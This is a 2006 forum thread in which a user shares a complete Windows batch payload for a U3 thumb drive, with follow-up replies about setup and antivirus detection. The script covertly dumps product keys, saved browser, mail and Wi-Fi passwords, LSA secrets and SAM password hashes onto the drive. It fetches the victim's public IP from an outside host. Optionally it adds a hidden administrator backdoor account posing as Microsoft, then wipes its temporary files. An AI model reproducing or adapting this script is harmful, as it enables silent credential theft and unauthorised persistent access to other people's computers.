MrTRiX Posted November 2, 2006 Share Posted November 2, 2006 I just turn this into a ISO and burn it to the U3. The thumbdrive can remain totaly empty and it will still work. The way I have it setup is so that it reads all the drive volume labels and looks for a certain string. My U3 thumbdrive is named "2 GB (1)" the 1 stands for mode 1 in which it just gets password/key data and nothing else. 2 installs the remote user and 0 just runs launchpad. This will have to be modified a bit for each user but its prety straight forward. Also I didn't post any links to the programs cause there easy to find but if you have trouble finding one just ask. @ECHO OFFFOR %%A IN (C D E F G H I J K L M N O P Q R S T U V W X Y Z) DO ( FOR /F "tokens=1-8" %%1 IN ('VOL %%A:') DO ( IF %%6%%7%%8 EQU 2GB^(0^) ( START %%A:U3LauncherLaunchU3.exe ) IF %%6%%7%%8 EQU 2GB^(1^) ( SET USBDrive=%%A ) IF %%6%%7%%8 EQU 2GB^(2^) ( SET BackDoor=1 SET USBDrive=%%A ) ) ) IF NOT DEFINED USBDrive EXIT ECHO #####################################>>%USBDrive%:PC_%COMPUTERNAME%.txt ECHO ## Retrieve Microsoft Product Keys ##>>%USBDrive%:PC_%COMPUTERNAME%.txt ECHO #####################################>>%USBDrive%:PC_%COMPUTERNAME%.txt ECHO.>>%USBDrive%:PC_%COMPUTERNAME%.txt ProduKey.exe /stab %TEMP%ProduKey.txt TYPE %TEMP%ProduKey.txt>>%USBDrive%:PC_%COMPUTERNAME%.txt ECHO.>>%USBDrive%:PC_%COMPUTERNAME%.txt ECHO #####################>>%USBDrive%:PC_%COMPUTERNAME%.txt ECHO ## Retrieve WAN IP ##>>%USBDrive%:PC_%COMPUTERNAME%.txt ECHO #####################>>%USBDrive%:PC_%COMPUTERNAME%.txt ECHO.>>%USBDrive%:PC_%COMPUTERNAME%.txt wget.exe -t1 -T1 -q http://dynupdate.no-ip.com/ip.php -O %TEMP%wanip.txt TYPE %TEMP%wanip.txt>>%USBDrive%:PC_%COMPUTERNAME%.txt ECHO.>>%USBDrive%:PC_%COMPUTERNAME%.txt ECHO.>>%USBDrive%:PC_%COMPUTERNAME%.txt ECHO #####################>>%USBDrive%:PC_%COMPUTERNAME%.txt ECHO ## Retrieve LAN IP ##>>%USBDrive%:PC_%COMPUTERNAME%.txt ECHO #####################>>%USBDrive%:PC_%COMPUTERNAME%.txt ipconfig.exe>>%USBDrive%:PC_%COMPUTERNAME%.txt ECHO.>>%USBDrive%:PC_%COMPUTERNAME%.txt ECHO ################################>>%USBDrive%:PC_%COMPUTERNAME%.txt ECHO ## Retrieve Program Passwords ##>>%USBDrive%:PC_%COMPUTERNAME%.txt ECHO ################################>>%USBDrive%:PC_%COMPUTERNAME%.txt ECHO.>>%USBDrive%:PC_%COMPUTERNAME%.txt iepv.exe /stab %TEMP%iepv.txt mailpv.exe /stab %TEMP%mailpv.txt mspass.exe /stab %TEMP%mspass.txt netpass.exe /stab %TEMP%netpass.txt pspv.exe /stab %TEMP%pspv.txt WirelessKeyView.exe /stab %TEMP%WirelessKeyView.txt TYPE %TEMP%iepv.txt>>%USBDrive%:PC_%COMPUTERNAME%.txt TYPE %TEMP%mailpv.txt>>%USBDrive%:PC_%COMPUTERNAME%.txt TYPE %TEMP%mspass.txt>>%USBDrive%:PC_%COMPUTERNAME%.txt TYPE %TEMP%netpass.txt>>%USBDrive%:PC_%COMPUTERNAME%.txt TYPE %TEMP%pspv.txt>>%USBDrive%:PC_%COMPUTERNAME%.txt TYPE %TEMP%WirelessKeyView.txt>>%USBDrive%:PC_%COMPUTERNAME%.txt ECHO.>>%USBDrive%:PC_%COMPUTERNAME%.txt ECHO ############################>>%USBDrive%:PC_%COMPUTERNAME%.txt ECHO ## Retrieve LSA Passwords ##>>%USBDrive%:PC_%COMPUTERNAME%.txt ECHO ############################>>%USBDrive%:PC_%COMPUTERNAME%.txt ECHO.>>%USBDrive%:PC_%COMPUTERNAME%.txt LSASecretsDump.exe>>%USBDrive%:PC_%COMPUTERNAME%.txt ECHO ########################>>%USBDrive%:PC_%COMPUTERNAME%.txt ECHO ## Retrieve SAM Files ##>>%USBDrive%:PC_%COMPUTERNAME%.txt ECHO ########################>>%USBDrive%:PC_%COMPUTERNAME%.txt ECHO.>>%USBDrive%:PC_%COMPUTERNAME%.txt PwDump.exe 127.0.0.1>>%USBDrive%:PC_%COMPUTERNAME%.txt ECHO.>>%USBDrive%:PC_%COMPUTERNAME%.txt IF DEFINED BackDoor ( ECHO ##########################>>%USBDrive%:PC_%COMPUTERNAME%.txt ECHO ## Create Backdoor User ##>>%USBDrive%:PC_%COMPUTERNAME%.txt ECHO ##########################>>%USBDrive%:PC_%COMPUTERNAME%.txt ECHO.>>%USBDrive%:PC_%COMPUTERNAME%.txt NET USER /ADD SUPPORT_388945a1 password /FULLNAME:"Microsoft Corporation">>%USBDrive%:PC_%COMPUTERNAME%.txt NET LOCALGROUP Administrators SUPPORT_388945a1 /ADD>>%USBDrive%:PC_%COMPUTERNAME%.txt REG ADD "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" /V SUPPORT_388945a1 /T REG_DWORD /D 0 /F>>%USBDrive%:PC_%COMPUTERNAME%.txt ECHO.>>%USBDrive%:PC_%COMPUTERNAME%.txt ) REM ############################ REM ## Delete Temporary Files ## REM ############################ DEL /F /Q %TEMP%ProduKey.txt DEL /F /Q %TEMP%ip.php DEL /F /Q %TEMP%iepv.txt DEL /F /Q %TEMP%mailpv.txt DEL /F /Q %TEMP%mspass.txt DEL /F /Q %TEMP%netpass.txt DEL /F /Q %TEMP%pspv.txt DEL /F /Q %TEMP%WirelessKeyView.txt It seems to work without error but I would love suggestions on improvment if you have any. Quote Link to comment Share on other sites More sharing options...
Moo Posted November 2, 2006 Share Posted November 2, 2006 wait, so does this not use a go.cmd? or am i misunderstanding Quote Link to comment Share on other sites More sharing options...
MrTRiX Posted November 3, 2006 Author Share Posted November 3, 2006 This is a replacement for go.cmd. You turn this into a .cmd and put it on the iso with all the tools. Then name the thumbdrive part 2 GB (0) or whatever u want as long as its <something> *space* <something> *space* (0,1,2)/ Quote Link to comment Share on other sites More sharing options...
spektormax Posted November 3, 2006 Share Posted November 3, 2006 this is eseicanly the spektormax payload just redone, it has the exact same fucntionalty.. stay tune for ICBM Quote Link to comment Share on other sites More sharing options...
pseudobreed Posted November 3, 2006 Share Posted November 3, 2006 The only reason people never "burned" the payload into the iso is so that you can edit it on the fly and not have to reformat your USB Drive to update the new payload. The only thing I would "burn" would be static files. However, really this does not have any advantage. Quote Link to comment Share on other sites More sharing options...
Moo Posted November 3, 2006 Share Posted November 3, 2006 would this still be picked up by antivirus programs? Quote Link to comment Share on other sites More sharing options...
pseudobreed Posted November 3, 2006 Share Posted November 3, 2006 would this still be picked up by antivirus programs? Yes. It's not the batch is the problem, it's the applications being used to enumerate the information. However, the antivirus will not be able to remove the file, just not allow the OS to run it. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.